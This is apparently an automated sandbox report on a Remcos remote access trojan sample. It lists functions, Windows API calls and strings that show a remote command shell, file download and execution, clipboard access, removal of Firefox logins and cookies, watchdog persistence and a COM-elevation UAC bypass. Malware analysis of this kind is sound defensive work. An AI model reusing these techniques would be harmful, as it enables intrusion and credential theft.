              • API ID: __alldvrm
              • String ID:
              • API String ID: 65215352-0
              • Opcode ID: 28369f91ca91e66110a0b1c9409ed0194f098364de9e422e31faff2ad6e8f38b
              • Instruction ID: 96d9d97d68b67d0c8e80b5665a39335b0ee5c72343be31c2f0b4d265a228e715
              • Opcode Fuzzy Hash: 28369f91ca91e66110a0b1c9409ed0194f098364de9e422e31faff2ad6e8f38b
              • Instruction Fuzzy Hash: 08012872950318BFDB24EF64C942B6E77ECEB0531DF10846FE48597240C6799D00C75A
              Function 00446137 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
              • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
              • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
              • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
              Function 0040489E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
              Download Yara Rule
              APIs
              • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Startup
              • String ID:
              • API String ID: 724789610-0
              • Opcode ID: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
              • Instruction ID: a24ce82555f98f109a53945ea9c337c8597cdca763f75144b39f195b4e3f482d
              • Opcode Fuzzy Hash: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
              • Instruction Fuzzy Hash: 0DD0C9325586088AE620AAB4AD0B8A4775C8312615F0007AA6CA5835D2E6446A19C2AA
              Function 00426CC8 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: send
              • String ID:
              • API String ID: 2809346765-0
              • Opcode ID: a64cf630b3b4fcbf92e6cf8d3c010959396a6b24f5439efeece66edae75e3506
              • Instruction ID: 80dceff54fd7c7607e374e8a405dba3f032bb15cdc3f4a53630576a73fa931ff
              • Opcode Fuzzy Hash: a64cf630b3b4fcbf92e6cf8d3c010959396a6b24f5439efeece66edae75e3506
              • Instruction Fuzzy Hash: 79B09279108202FFCB150B60CD0887A7EAAABC8381F008A2CB187411B1C636C852AB26
              Function 00426CB1 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: recv
              • String ID:
              • API String ID: 1507349165-0
              • Opcode ID: 12f17b9eb2b05ccee17ecde8d051cd75af37e2c2e0a2002d53484fbbe037e517
              • Instruction ID: 54da5cb0358175ea3eef87e0ba5f02fe09cc36e19498aa822303b7a5c5cf0de8
              • Opcode Fuzzy Hash: 12f17b9eb2b05ccee17ecde8d051cd75af37e2c2e0a2002d53484fbbe037e517
              • Instruction Fuzzy Hash: 38B09B75108302FFC6150750CC0486A7D66DBC8351B00481C714641170C736C8519725

              Non-executed Functions

              Function 00407C97 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON
              Download Yara Rule
              APIs
              • SetEvent.KERNEL32(?,?), ref: 00407CB9
              • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
              • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
              • GetLogicalDriveStringsA.KERNEL32 ref: 00408278
              • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
              • DeleteFileA.KERNEL32(?), ref: 00408652
                • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
              • Sleep.KERNEL32(000007D0), ref: 004086F8
              • StrToIntA.SHLWAPI(00000000), ref: 0040873A
                • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32 ref: 0041CAD7
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
              • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
              • API String ID: 1067849700-181434739
              • Opcode ID: 4e58a0086eefa5a7d711f599d6b504f8132a4b145ccff10764beb7e3a44898d0
              • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
              • Opcode Fuzzy Hash: 4e58a0086eefa5a7d711f599d6b504f8132a4b145ccff10764beb7e3a44898d0
              • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
              Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON
              Download Yara Rule
              APIs
              • __Init_thread_footer.LIBCMT ref: 004056E6
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
              • __Init_thread_footer.LIBCMT ref: 00405723
              • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
              • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
              • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
              • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
              • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
              • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
              • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
              • TerminateProcess.KERNEL32(00000000), ref: 00405A17
              • CloseHandle.KERNEL32 ref: 00405A23
              • CloseHandle.KERNEL32 ref: 00405A2B
              • CloseHandle.KERNEL32 ref: 00405A3D
              • CloseHandle.KERNEL32 ref: 00405A45
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
              • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
              • API String ID: 2994406822-18413064
              • Opcode ID: 185a173cb34db82ff4a93fb45cf4562bf1f19873a7db0a51e34bec58793cf561
              • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
              • Opcode Fuzzy Hash: 185a173cb34db82ff4a93fb45cf4562bf1f19873a7db0a51e34bec58793cf561
              • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
              Function 004120F7 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
              Download Yara Rule
              APIs
              • GetCurrentProcessId.KERNEL32 ref: 00412106
                • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                • Part of subcall function 00413877: RegCloseKey.KERNEL32(004660A4), ref: 004138AB
              • OpenMutexA.KERNEL32 ref: 00412146
              • CloseHandle.KERNEL32(00000000), ref: 00412155
              • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
              • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
              • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
              • API String ID: 3018269243-13974260
              • Opcode ID: 2bc8fd5c154d9cc769ef6804c594b66dd22dad559f3b9a4926214948642efd23
              • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
              • Opcode Fuzzy Hash: 2bc8fd5c154d9cc769ef6804c594b66dd22dad559f3b9a4926214948642efd23
              • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
              Function 0040BB30 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
              Download Yara Rule
              APIs
              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
              • FindClose.KERNEL32(00000000), ref: 0040BBC9
              • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
              • FindClose.KERNEL32(00000000), ref: 0040BD12
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Find$CloseFile$FirstNext
              • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
              • API String ID: 1164774033-3681987949
              • Opcode ID: a7abc2cbee64d590697779d9a46801e96057498aa45ff5fe343c94ad28998e44
              • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
              • Opcode Fuzzy Hash: a7abc2cbee64d590697779d9a46801e96057498aa45ff5fe343c94ad28998e44
              • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
              Function 004168C1 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON
              Download Yara Rule
              APIs
              • OpenClipboard.USER32 ref: 004168C2
              • EmptyClipboard.USER32 ref: 004168D0
              • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
              • GlobalLock.KERNEL32 ref: 004168F9
              • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
              • SetClipboardData.USER32 ref: 00416938
              • CloseClipboard.USER32 ref: 00416955
              • OpenClipboard.USER32 ref: 0041695C
              • GetClipboardData.USER32 ref: 0041696C
              • GlobalLock.KERNEL32 ref: 00416975
              • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
              • CloseClipboard.USER32 ref: 00416984
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
              • String ID: !D@
              • API String ID: 3520204547-604454484
              • Opcode ID: 6c018320e5b0d2cabe6153e6df3be29feb4b7020e0ff09a9ecc452abf36931f7
              • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
              • Opcode Fuzzy Hash: 6c018320e5b0d2cabe6153e6df3be29feb4b7020e0ff09a9ecc452abf36931f7
              • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
              Function 0040BD37 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
              Download Yara Rule
              APIs
              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
              • FindClose.KERNEL32(00000000), ref: 0040BDC9
              • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
              • FindClose.KERNEL32(00000000), ref: 0040BEAF
              • FindClose.KERNEL32(00000000), ref: 0040BED0
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Find$Close$File$FirstNext
              • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
              • API String ID: 3527384056-432212279
              • Opcode ID: 48f1059577fb6fb3e12f81dcccae54fa1aae2825fed048d23a83c2489a6cdfe4
              • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
              • Opcode Fuzzy Hash: 48f1059577fb6fb3e12f81dcccae54fa1aae2825fed048d23a83c2489a6cdfe4
              • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
              Function 0040F474 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON
              Download Yara Rule
              APIs
              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
              • CloseHandle.KERNEL32(00000000), ref: 0040F563
                • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
              • CloseHandle.KERNEL32(00000000), ref: 0040F66E
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
              • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
              • API String ID: 3756808967-1743721670
              • Opcode ID: 8520e54c90e73ae769b9472ab5acef4e7d13580ea560d925ff866fcf30e94af2
              • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
              • Opcode Fuzzy Hash: 8520e54c90e73ae769b9472ab5acef4e7d13580ea560d925ff866fcf30e94af2
              • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
              Function 00419627 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: 0$1$2$3$4$5$6$7$VG
              • API String ID: 0-1861860590
              • Opcode ID: 6e6c7a448708c07855854a0ebdca304f9e0347beed71fdd78d4df1a7a8a0f9ff
              • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
              • Opcode Fuzzy Hash: 6e6c7a448708c07855854a0ebdca304f9e0347beed71fdd78d4df1a7a8a0f9ff
              • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
              Function 004074FD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
              Download Yara Rule
              APIs
              • _wcslen.LIBCMT ref: 00407521
              • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Object_wcslen
              • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
              • API String ID: 240030777-3166923314
              • Opcode ID: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
              • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
              • Opcode Fuzzy Hash: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
              • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
              Function 0041A748 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
              Download Yara Rule
              APIs
              • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
              • GetLastError.KERNEL32 ref: 0041A7BB
              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: EnumServicesStatus$ErrorLastManagerOpen
              • String ID:
              • API String ID: 3587775597-0
              • Opcode ID: a92e5e22f525c5d855de5902c8743aa5aa96fd2eb9e2bef805906780dfe370d3
              • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
              • Opcode Fuzzy Hash: a92e5e22f525c5d855de5902c8743aa5aa96fd2eb9e2bef805906780dfe370d3
              • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
              Function 00452610 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
              Download Yara Rule
              APIs
                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
              • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
              • IsValidCodePage.KERNEL32(00000000), ref: 00452777
              • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
              • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
              • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
              • String ID: lJD$lJD$lJD
              • API String ID: 745075371-479184356
              • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
              • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
              • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
              • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
              Function 0040C34D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
              Download Yara Rule
              APIs
              • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
              • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
              • FindClose.KERNEL32(00000000), ref: 0040C47D
              • FindClose.KERNEL32(00000000), ref: 0040C4A8
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Find$CloseFile$FirstNext
              • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
              • API String ID: 1164774033-405221262
              • Opcode ID: e5779cf76b5a77b8801820eb787e52b5a733e9d63f63ab9a2c996bd2ffd17758
              • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
              • Opcode Fuzzy Hash: e5779cf76b5a77b8801820eb787e52b5a733e9d63f63ab9a2c996bd2ffd17758
              • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
              Function 0041C291 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
              Download Yara Rule
              APIs
              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C38E
              • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C39B
                • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
              • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3BC
              • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
              • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
              • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3E2
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
              • String ID:
              • API String ID: 2341273852-0
              • Opcode ID: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
              • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
              • Opcode Fuzzy Hash: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
              • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
              Function 00419AF5 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
              Download Yara Rule
              APIs
              • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
              • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: File$Find$CreateFirstNext
              • String ID: 8SG$PXG$PXG$NG$PG
              • API String ID: 341183262-3812160132
              • Opcode ID: b6fdd12ea4283b508e25f04ac6086fd651a88d51969d46a0526c61d0c238dc80
              • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
              • Opcode Fuzzy Hash: b6fdd12ea4283b508e25f04ac6086fd651a88d51969d46a0526c61d0c238dc80
              • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
              Function 00413FCA Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
              Download Yara Rule
              APIs
              • RegCreateKeyExW.ADVAPI32(00000000), ref: 0041409D
              • RegCloseKey.ADVAPI32(?), ref: 004140A9
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
              • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 0041426A
              • GetProcAddress.KERNEL32(00000000), ref: 00414271
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: AddressCloseCreateLibraryLoadProcsend
              • String ID: SHDeleteKeyW$Shlwapi.dll
              • API String ID: 2127411465-314212984
              • Opcode ID: e30b5f6ce4cbdd366537afe2320d9bfcb0a6543311229dd69bf6235dce3d7422
